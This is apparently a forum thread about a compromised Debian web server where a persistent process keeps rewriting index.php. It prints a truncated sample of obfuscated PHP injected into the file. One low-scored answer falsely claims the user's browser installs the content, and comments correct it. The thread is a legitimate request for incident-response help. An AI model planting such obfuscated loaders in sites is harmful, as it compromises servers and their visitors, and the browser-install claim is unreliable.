# File is automatically recreated after I remove/edit it

Tags: linux, debian

A process seems to have gained control of my system and it has edited a couple of files in the root folder of my web application, for example, `index.php`.

I have tried to restore these files, but the uninvited process has changed the permissions to "read-only"

I have tried the following:

Change owner/permissions and then try editing the file.
Result: Both owner and permissions are changed back automatically

Change owner/permissions and then try deleting the file
Result: The file appears to be deleted but is recreated again with the same edited content a millisecond later

Also experimented with `auditctl` to monitor the file, but without success as it only logs my commands on the file and nothing from the other process

So my questions are how do I get control of the file and how can I detect the process causing this so I can shut it down? Any suggestions on what I can try to do?

**UPDATE:**

When I use "chmod" and then check "ls -l" I see that my changes have been applied. But then when I check "ls -l" again after I try to edit or delete the files, the changes I made with chmod are restored.

I know it is possible to delete the file (for a few milliseconds) because I tried spamming "rm" several times in a row and if I was fast enough I finally got the message: "No such file or directory".

I don't know if the process only edits files in the website folder, but that's where I've noticed it.

I suspect my host as my application offers a competing service, but I'm not sure. Even though, shouldn't I be able to get control of the file/process as I have root access?

Original file:

```
<?php include 'pages/home/home.php'; ?>
```

Edited file:

```
<?php /*-wxD=-*/error_reporting(0); $TlQa /*-DZ@mPZJ(C>cyqBG[-*/=/*-;z4tQE}FbYQPgp3Df_f-*/ "ra"./*-e6wxBt3m.2MGhvLXW-*/>include 'pages/home/home.php';
```

Comment: "a couple of files" – What are the pathnames?

Comment: Does the process create the index.php from scratch or is it modifying one that you have already put there? If it creates it from scratch can you post it here in your question? (Copy and paste, then use the `{}` button to mark it as code.)

Comment: 1. Is the unknown process creating files _only_ in your website area, or have you noticed files being created elsewhere in the filesystem?

Comment: 2. If you stop the webserver service does the unknown process stop recreating the `index.php` file?

Comment: 3. If you reboot the system does the unknown process stop recreating the `index.php` file?

Comment: Please investigate and then add the results to your question, ideally updating the text as if you were writing the question for the first time with this extra information already to hand

Comment: You could try using `lsof /path/to/file` to maybe catch the PID.

Comment: "The `index.php` file is the skeleton of the website. Every page that `Joomla!` delivers is `index.php` fleshed out with content inserted from the database." Your own browser is installing this as content from any Joomla site you visit.

Comment: @Paul_Pedant that is not how that works.

Comment: @MarcusMüller  The docs refer to "the index.php of the root directory". It links somewhere else, though.

Comment: How fast does the files change back   If it's not immediately I'd look for something like puppet or ansible making the changes.

Comment: 4. What changes does it make to the index.php, or is it that it creates it in its entirety? Can you share the (modified) content it creates?

Comment: Maybe see questions about "What to do if my system was hacked?". You could shutdown your service, verify the integrity of your system, install missing updates, etc. Maybe also subscribe to security announcements for the software you are using.

Answer (score -2):

Your own browser is installing this as content from any Joomla site you visit.

The `Joomla!` documentation (base page `docs.joomla.org/Main_Page` has a search option - try `index.php`) states:

> The index.php file is the skeleton of the website. Every page that
> Joomla! delivers is index.php fleshed out with content inserted from
> the database.
>
> Because Joomla! is written in PHP, index.php is the
> automatically-served file. To further complicate things, when a user
> navigates to the Joomla website, the index.php of the root directory
> redirects to the index.php of the current template.

Comment: A browser can't install anything on a server. Op is taking about files in their webroot, not URLs

Comment: Paul you're misunderstanding [Joomla!'s documentation](https://docs.joomla.org/What_is_the_purpose_of_the_index.php_file%3F). It's saying that the `index.php` is executed on the server to generate an HTML page (of HTML code), not that the `index.php` is physically modified